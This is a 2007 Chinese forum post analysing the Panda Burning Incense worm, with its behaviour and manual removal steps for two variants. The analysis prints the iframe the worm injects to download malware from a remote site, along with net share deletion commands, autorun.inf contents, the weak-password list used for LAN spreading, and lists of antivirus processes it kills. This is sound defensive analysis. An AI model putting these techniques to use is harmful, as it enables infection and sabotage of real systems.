|
|
熊猫烧香(Worm.Nimaya/武汉男生)病毒介绍
中 文 名:“熊猫烧香”
病毒长度:可变
病毒类型:蠕虫
危害等级:★★★
影响平台:Win 9X/ME/NT/2000/XP/2003
“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
图片附件: 2.jpg (2007-1-19 13:54, 2.59 K)
1:拷贝文件
病毒运行后,会把自己拷贝到C:\\WINDOWS\\System32\\Drivers\\spoclsv.exe
2:添加注册表自启动
病毒会添加自启动项HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run svcshare -> C:\\WINDOWS\\System32\\Drivers\\spoclsv.exe
3:病毒行为
a:每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序:
QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword
并使用的键盘映射的方法关闭安全软件IceSword
添加注册表使自己自启动 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run svcshare -> C:\\WINDOWS\\System32\\Drivers\\spoclsv.exe
并中止系统中以下的进程:
Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe
b:每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享
c:每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享
d:每隔6秒删除安全软件在注册表中的键值
并修改以下值不显示隐藏文件 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL CheckedValue -> 0x00
删除以下服务:
navapsvc、wscsvc、KPfwSvc、SNDSrvc、无党派人士roxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc
e:感染文件
病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部,并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址,用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件:
WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone
g:删除文件
病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失。
“熊猫烧香”(“威金”变种qo)是一个由Delphi工具编写的蠕虫,终止大量的反病毒软件和防火墙软件进程,病毒会删除扩展名为gho的文件,使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统的*.exe、*.com、*.pif、*.src、*.html、*.asp文件,添加病毒网址,导致用户一打开这些网页文件,IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe,可以通过U盘和移动硬盘等方式进行传播,并且利用Windows系统的自动播放功能来运行。搜索硬盘中的*.EXE可执行文件并感染,感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。
该病毒目前已作案数十万起,并接连通过多家大型网站传播,请电脑用户立即下载专杀工具全面查杀。
“威金”病毒新变种“熊猫烧香”仍在疯狂传播,上演着最后的疯狂。近阶段该病毒的传播手段更是无所不用其及,继一些IT专业门户及资讯网站成为病毒帮凶后,一家普及率非常高的影音播放软件网站也感染了该病毒,用户点击网页即可中毒。“熊猫烧香”不但可以终止大量的杀毒软件和防火墙程序,而且还禁止用户使用GHOST恢复系统,通过U盘、共享文件夹、系统默认共享、IE漏洞、QQ漏洞、系统弱口令等等多种途径传播,局域网中一台机器感染,可以瞬间传遍整个网络。
导致病毒快速传播目前存在两大原因。一个大量的企业用户使用国外杀毒软件,而国外杀毒软件对于此类国产病毒响应速度特别慢。二是一部分网站编辑或网站管理人员本身机器感染了病毒,由于病毒能够修改HTML文件,当他们把受感染文件上传到服务器后,访问者点击此类受感染网页即中毒。
由于“熊猫烧香”病毒能够反复感染电脑,因此没有感染病毒或已清除病毒的用户应立即采取防范措施,堵好病毒的所有入口,彻底阻止病毒入侵。
预防措施:
1。安装杀毒软件(如drweb ,驱逐舰,卡巴死机),每天升级更新病毒库!开启实时监控功能!
2。尽量不要去陌生网站,下载运行不明程序!
3。局域网用户尽量避免创建可写的共享目录(附件提供关闭共享程序),已经创建共享目录的应立即停止共享。
4。如无必要,Windows 2000/XP用户应尽量关闭IPC$共享,并给具有管理员权限的帐号设置强健的密码。
5。及时安装微软的安全更新,不要随意访问来源不明的网站。特别是微软的MS06-014漏洞,应立即打好该漏洞补丁。
补丁下载地址:在本帖附件下载!
6。QQ用户请下载安装最新版本的QQ软件,已发现多起恶意网站利用QQ漏洞传播熊猫蠕虫的现象。
7。保护U盘:对U盘进行免疫处理,在U盘根目录内新建 以下四个文件夹: autorun.inf Desktop_.ini GameSetup.exe _Disktop.ini 设置为只读!
8。使用U盘等移动设备交换文件时,要开启杀毒软件的实时监控,或先用杀毒软件扫描,并关闭自动播放功能,必要情况下开启U盘写保护再使用U盘!最好运用win+E 键打开U盘。
9。保护GHOST备份文件:将GHOST备份文件如:XXX.GHO 的后缀名改为C_PAN.XXX 避免被熊猫烧香破坏!要使用时再恢复为 XXX.GHO
关闭自动播放功能方法:
在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可。
熊猫烧香病毒手动清除修复方案
熊猫烧香病毒、熊猫烧香病毒变种的查杀方法及熊猫烧香病毒的手动清除方案。提供了进程为spoclsv.exe和FuckJacks.exe的病毒变种解决方案。
一、在动手查杀熊猫烧香病毒之前,强烈建议先注意以下四点:
1.本文包含两种熊猫烧香病毒变种的描述,请注意查看病毒症状,根据实际情况选用不同的查杀方法。
2.对于被熊猫烧香病毒感染的.exe可执行文件,推荐先备份,再修复!
3.找回被熊猫烧香病毒删除的ghost(.gho)文件,详情请见文中!
4.对计算机了解不多的用户,请在专家指导下清除熊猫烧香病毒。
二、熊猫烧香病毒变种一:病毒进程为“spoclsv.exe”
这是“熊猫烧香”早期变种之一,特别之处是“杀死杀毒软件”,最恶劣之处在于感染全盘.exe文件和删除.gho文件(Ghost的镜像文件)。
最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码,且一定要清除。否则访问了有此代码的网页,又会感染。
其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。
病毒描述:
“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,(.gho为GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
以下是熊猫烧香病毒详细行为和解决办法:
熊猫烧香病毒详细行为:
1.复制自身到系统目录下:
%System%\\drivers\\spoclsv.exe(“%System%”代表Windows所在目录,比如:C:\\Windows)
不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:\\WINDOWS\\System32\\Drivers\\spoclsv.exe。
2.创建启动项:
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]
\"svcshare\"=\"%System%\\drivers\\spoclsv.exe\"
3.在各分区根目录生成病毒副本:
X:\\setup.exe
X:\\autorun.inf
autorun.inf内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\\Auto\\command=setup.exe
4.使用net share命令关闭管理共享:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
5.修改“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion
\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL]
\"CheckedValue\"=dword:00000000
6.熊猫烧香病毒尝试关闭安全软件相关窗口:
天网防火墙,进程,VirusScan,NOD32,网镖,杀毒,毒霸,瑞星,江民,黄山IE,超级兔子,优化大师,木马清道夫,木马清道夫,QQ病毒,注册表编辑器,系统配置实用程序,卡巴斯基反病毒,Symantec AntiVirus,Duba,Windows 任务管理器, esteem procs,绿鹰PC,密码防盗,噬菌体,木马辅助查找器,System Safety Monitor, Wrapped gift Killer,Winsock Expert,游戏木马检测大师,超级巡警,msctls_statusbar32,pjf (ustc),IceSword。
7.尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程:
Mcshield.exe,VsTskMgr.exe,naPrdMgr.exe,UpdaterUI.exe,TBMon.exe, scan32.exe,Ravmond.exe,CCenter.exe,RavTask.exe,Rav.exe,Ravmon.exe, RavmonD.exe,RavStub.exe,KVXP.kxp,KvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe, KRegEx.exe,UIHost.exe,TrojDie.kxp,FrogAgent.exe,Logo1_.exe,Logo_1.exe, Rundl132.exe。
8.禁用安全软件相关服务:
Schedule,sharedaccess,RsCCenter, RsRavMon,KVWSC,KVSrvXP,kavsvc,AVP,McAfeeFramework,McShield, McTaskManager,navapsvc,wscsvc,KPfwSvc,SNDSrvc,无党派人士roxy,ccEvtMgr,ccSetMgr, SPBBCSvc,Symantec Core LC,NPFMntor,MskService,FireSvc。
9.删除安全软件相关启动项:
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RavTask
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\KvMonXP
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\kav
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\KAVPersonal50
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\McAfeeUpdaterUI
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Network …………Reporting Service
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ShStatEXE
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\YLive.exe
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\yassistse。
10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:
<iframe
src=\"hxxp://www.ctv163.com/wuhan/down.htm\" width=\"0\" height=\"0\" frameborder=\"0\">
</iframe>
但不修改以下目录中的网页文件:
C:\\WINDOWS
C:\\WINNT
C:\\system32
C:\\Documents and Settings
C:\\System Volume Information
C:\\Recycled
Program Files\\Windows NT
Program Files\\WindowsUpdate
Program Files\\Windows Media Player
Program Files\\Outlook Express
Program Files\\Internet Explorer
Program Files\\NetMeeting
Program Files\\Common Files
Program Files\\ComPlus Applications
Program Files\\Messenger
Program Files\\InstallShield Installation Information
Program Files\\MSN
Program Files\\Microsoft Frontpage
Program Files\\Movie Maker
Program Files\\MSN Gamin Zone
11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。
12.此外,病毒还会尝试删除GHO文件。
病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
Password,harley,golf,pussy,mustang,shadow,fish,qwerty,baseball,letmein, ccc,admin,abc,pass,passwd,database,abcd,abc123,sybase,123qwe,server, computer,super,123asd,ihavenopass,godblessyou,enable,alpha,1234qwer, 123abc,aaa,patrick,pat,administrator,root,sex,god,fuckyou,fuck,test, test123,temp,temp123,win,asdf,pwd,qwer,yxcv,zxcv,home,xxx,owner,login, Login,love,mypc,mypc123,admin123,mypass,mypass123,Administrator,Guest, admin,Root。
病毒文件内含有这些信息:
whboy
***武*汉*男*生*感*染*下*载*者***
解决方案:
1. 结束病毒进程:
%System%\\drivers\\spoclsv.exe
不同的spoclsv.exe变种,此目录可不同。比如2006年12月爆发的变种目录是:
C:\\WINDOWS\\System32\\Drivers\\spoclsv.exe。但可用此方法清除。
注意:“%System%\\system32\\spoclsv.exe”是系统文件。(目前看来没有出现插入该系统进程的变种,不排除变种的手法变化。)
查看当前运行spoclsv.exe的路径,可使用超级兔子魔法和超级巡警查看病毒进程。
2. 删除病毒文件:
%System%\\drivers\\spoclsv.exe
请注意区分病毒和系统文件。
3. 删除病毒启动项:
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]
\"svcshare\"=\"%System%\\drivers\\spoclsv.exe\"
4. 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:
X:\\setup.exe
X:\\autorun.inf
5. 恢复被修改的“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion
\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL]
\"CheckedValue\"=dword:00000001
6. 修复或重新安装被破坏的安全软件。
7.修复被感染的程序。可用专杀工具进行修复。如金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。
8. 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件,一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。
三、熊猫烧香病毒变种二:病毒进程为“FuckJacks.exe”
以下是数据安全实验室提供的信息与方法。
病毒描述:
含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
病毒基本情况:
[文件信息]
病毒名:Virus.Win32.EvilPanda.a.ex$
大小:0xDA00 (55808), (disk) 0xDA00 (55808)
SHA1:F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
壳信息:未知
危害级别:高
病毒名:Flooder.Win32.FloodBots.a.ex$
大 小:0xE800 (59392), (disk) 0xE800 (59392)
SHA1 :B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
壳信息:UPX 0.89.6 - 1.02 / 1.05 - 1.24
危害级别:高
病毒行为:
Virus.Win32.EvilPanda.a.ex$:
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%\\system32\\FuckJacks.exe
2、添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
键名:FuckJacks
键值:\"C:WINDOWS\\system32\\FuckJacks.exe\"
键路径:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
键名:svohost
键值:\"C:WINDOWS\\system32\\FuckJacks.exe\"
3、拷贝自身到所有驱动器根目录,命名为Setup.exe,并生成一个autorun.inf使得用户打开该盘运行病毒,并将这两个文件属性设置为隐藏、只读、系统。
C:autorun.inf 1KB RHS
C:setup.exe 230KB RHS
4、关闭众多杀毒软件和安全工具。
5、连接*****.3322.org下载某文件,并根据该文件记录的地址,去www.****.com下载某ddos程序,下载成功后执行该程序。
6、刷新bbs.qq.com,某QQ秀链接。
7、循环遍历磁盘目录,感染文件,对关键系统文件跳过,不感染Windows媒体播放器、MSN、IE 等程序。
Flooder.Win32.FloodBots.a.ex$:
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%\\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
%SystemRoot%\\system32\\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
2、该病毒后下载运行后,添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
键名:Userinit
键值:\"C:WINDOWS\\system32\\SVCH0ST.exe\"
3、连接ddos2.****.com,获取攻击地址列表和攻击配置,并根据配置文件,进行相应的攻击。
配置文件如下:
www.victim.net:3389
www.victim.net:80
www.victim.com:80
www.victim.net:80
1
1
120
50000
解决方案:
1. 断开网络
2. 结束病毒进程:%System%\\FuckJacks.exe
3. 删除病毒文件:%System%\\FuckJacks.exe
4. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件:
X:\\autorun.inf
X:\\setup.exe
5. 删除病毒创建的启动项:
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]
\"FuckJacks\"=\"%System%\\FuckJacks.exe\"
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
\"svohost\"=\"%System%\\FuckJacks.exe\"
6. 修复或重新安装反病毒软件。
7. 使用反病毒软件或专杀工具进行全盘扫描,清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。
手动恢复中毒文件(在虚拟机上通过测试,供参考)
1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件,即执行之前的步骤1、2、4、5。
2.打开“运行”输入“gpedit.msc”打开组策略-本地计算机策略-windows设置-安全设置-软件限制策略-其它规则。在其它规则上右键选择-新散列规则-打开新散列规则窗口。
3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择-不允许的。确定后重启。
4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项(不会有问题的)。
5.双击运行被感染的程序已经恢复原来样子了。全部回复后,用SREng把FuckJacks.exe在注册表里的启动项删除即可!
ps:此木马为蠕虫型病毒 之前本人测试过 其反杀毒软件反监控是一个极大的亮点 呵呵~~ 中毒不用紧张 一般手工就可以搞定.... 注意其下载的盗号木马和鸽子 |
|
发表于 2007-1-21 08:46:05